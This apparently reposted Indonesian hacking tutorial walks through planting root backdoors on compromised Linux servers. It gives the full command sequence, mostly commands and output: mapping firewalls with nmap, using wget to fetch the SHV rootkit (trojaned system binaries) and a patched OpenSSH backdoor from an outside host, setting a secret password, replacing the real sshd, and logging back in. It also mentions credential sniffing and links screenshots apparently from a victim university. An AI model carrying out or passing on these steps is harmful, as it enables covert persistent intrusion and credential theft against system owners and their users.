Ditampilkan dengan tujuan pembelajaran
By : PR1NCE
Apa
yang anda lakukan setelah mendapat sebuah root box dari hasil attacking
anda?! Banyak yang bisa anda lakukan bukan, misalnya untuk melakukan
attacking ke box lain, memasang sniffer, untuk keperluan DDoS atau
hanya sekedar memasang backdoor saja. Penulis hendak membagi tips n
trick pemasangan root backdoor yaitu pemasangan shv dan ssh backdoor.
Untuk itu silakan download dulu kedua backdoor tersebut di link
berikut :
http://geocities.com/pr1nce_empire/bd/shv7.tgz (This b/d is taken from
http://geocities.com/pr1nce_empire/bd/sshbd.tgz (patch is taken fro http://sec.angrypacket.com)
Installasi SHV
—————-
SHV Merupakan sebuah backdoor binding port disertai file - file
binaries yang terinfeksi malware, beberapa file yang di infeksi login,
ps, pstree, netstat, lsof, ls, md5sum dan masih ada beberapa lagi,
sebuah tips sederhana sebelum pemasangan SHV :
Lakukan
mapping firewall di shell yang hendak anda pasang target : Lihat
konfigurasi firewall host (iptables) di box target dengan perintah
iptables -L
[root@target]# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Kalo
anda mendapat hasil diatas betapa beruntungnya anda karena tidak di set
firewall host. Mapping firewall network, yang kemungkinan berada
dirouter atau gateway dengan nmap dari box milik anda (bukan box yang
dipasang backdoor). Caranya mudah nmap -sA -vv <IP>
[root@aku] nmap -sA -vv xxx.xxx.xxx.xxx
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2002-11-11 16:21 EST
Initiating ACK Scan against xxxxxxxxxxxxxxxxxx [1663 ports] at 16:21
The ACK Scan took 29.98s to scan 1663 total ports.
Host xxxxxxxxxxxxx appears to be up … good.
Interesting ports on xxxxxxxxxxxxxxx:
(The 1594 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
20/tcp UNfiltered ftp-data
21/tcp UNfiltered ftp
22/tcp UNfiltered ssh
23/tcp UNfiltered telnet
25/tcp UNfiltered smtp
53/tcp UNfiltered domain
80/tcp UNfiltered http
81/tcp UNfiltered hosts2-ns
110/tcp UNfiltered pop3
113/tcp UNfiltered auth
123/tcp UNfiltered ntp
143/tcp UNfiltered imap
443/tcp UNfiltered https
873/tcp UNfiltered rsync
993/tcp UNfiltered imaps
995/tcp UNfiltered pop3s
1455/tcp UNfiltered esl-lm
3128/tcp UNfiltered squid-http
5000/tcp UNfiltered UPnP
5001/tcp UNfiltered commplex-link
5050/tcp UNfiltered mmcc
5100/tcp UNfiltered admd
5555/tcp UNfiltered freeciv
6000/tcp UNfiltered X11
Nmap finished: 1 IP address (1 host up) scanned in 31.782 seconds
Raw packets sent: 3259 (130KB) | Rcvd: 70 (3220B)
[root@aku]#
Kemudian lihat port yang LISTEN di box yang hendak di pasang backdoor
[root@target]#netstat -tanp|grep LISTEN
netstat -tanp|grep LISTEN
tcp 0 0 127.0.0.1:2222 0.0.0.0:* LISTEN 4083/ssh
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2438/portmap
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 3233/X
tcp 0 0 0.0.0.0:630 0.0.0.0:* LISTEN 2568/rpc.statd
tcp 0 0 127.0.0.1:5335 0.0.0.0:* LISTEN 3315/mDNSResponder
tcp 0 0 0.0.0.0:7741 0.0.0.0:* LISTEN 3673/lisa
tcp 0 0 ::1:2222 :::* LISTEN 4083/ssh
tcp 0 0 :::6000 :::* LISTEN 3233/X
tcp 0 0 :::22
Sekarang
saatnya memasang backdoor, pertama lihat port yang tidak di blok
firewall host maupun firewall network, namun tidak pada saat state
LISTEN, misal hasil diatas port 5555 (gunakan port ini saat installasi
shv)
[root@target]#wget http://geocities.com/pr1nce_empire/bd/shv7.tgz;tar zxvf shv7.tgz
[root@target]#cd shv5;./setup asdfg123 5555 (Tunggu sampai installasi selesai)
perhatikan
bahwa asdfg123 adalah password backdoor, dan 5555 adalah port backdoor
Untuk masuk dari box anda ke box target yang sudah dipasang backdoor,
gunakan ssh
[root@aku]#ssh -p 5555 root@xxx.xxx.xxx.xxx
password: <enter>
blablabla
[root@target]#
WUPPZZZ, backdooring success Wink
Installasi SSH backdoor
————————
Backdoor
SHV terlalu mudah ketahuan oleh admin, apalagi file - file binaries
yang di infeksi SHV terkadang rusak, sehingga timbul kecurigaan admin,
Solusinya gunakan OpenSSH backdoor berikut. Sebelumnya, thx for
previous article ssh backdooring by scut http://jasakom.com/article.aspx?ID=429
Hanya untuk mempermudah saja link ini merupakan OpenSSH yang sudah saya
patch, sehingga anda hanya perlu mengubah versi yang ada di version.h
dan password yang ada di file includes.h Silakan di download di http://geocities.com/pr1nce_empire/bd/sshbd.tgz Proses installasi nya simple saja, lakukan di box yang hendak dipasang backdoor [root@target]#wget http://geocities.com/pr1nce_empire/bd/sshbd.tgz;tar zxvf sshbd.tgz;cd openssh
Oke,
sekarang sesuaikan versi openssh dengan openssh box target yang asli
(ingat kita menggunakan OpenSSH 3.4p1). Edit file version.h
#define SSH_VERSION "OpenSSH_4.2"
Ubah password backdoor sesuai keinginan anda dengan melakukan pengeditan pada file includes.h
#define _SECRET_PASSWD "asdfg123"
Setelah semua beres, mulai lakukan installasi misal sebagai berikut : (Hanya SEMISAL SAJA, gunakan kreatifitas anda oke!!)
[root@target]#./configure --prefix=/usr/local/sshd/ (Tunggu sampai selesai)
[root@target]#make;make install (Tunggu sampai selesai)
[root@target]#ps -axu|grep /sbin/sshd
Warning: bad ps syntax, perhaps a bogus ‘-’? See http://procps.sf.net/faq.html
root 3380 0.0 0.6 4272 1576 ? Ss 13:15 0:00 /usr/sbin/sshd
root 4903 0.0 0.2 2032 664 pts/5 S+ 16:56 0:00 grep /sbin/sshd
[root@target]#kill -9 3380;mv /usr/sbin/sshd .
[root@target]#cp /usr/local/sshd/sbin/sshd /usr/sbin/sshd
[root@target]#chmod +x /usr/sbin/sshd;kill -HUP `cat /var/run/sshd.pid`
Selesai installasi, sekarang coba anda login dari box anda ke box backdoor dengan
[root@aku]#ssh root@xxx.xxx.xxx.xxx (Ini adalah IP box backdoor)
password : <enter>
blablabla
[root@target]#
Cihuy….. sukses broooo!!!!
Sebenarnya
ssh backdoor dilengkapi juga dengan sniffing features, namun saya pikir
tidak perlu saya bahas karena sudah dijelaskan di artikel-artikel yang
saya lampirkan, right?? Wink Yahh terkahir mudah - mudahan tutorial
singkat n lamer ini ada manfaatnya bagi orang - orang yang sedang
belajar backdooring Smile
NB : Contoh pemasangan SSH Backdoor + Shell hasil Sniffer sebagai berikut : (Saya lebih suka ssh b/d ketimbang SHV)
SSH root backdoor
http://geocities.com/pr1nce_empire/example/webugm.jpg
Sniffing oleh backdoor
http://geocities.com/pr1nce_empire/example/infougm.jpg
http://geocities.com/pr1nce_empire/example/elisa.jpg[/quote]
Diambil dari http://selikoer.wordpress.com/2007/04/01/teknik-backdooring-linux/#more-24
Sorry, your account does not have access to post comments.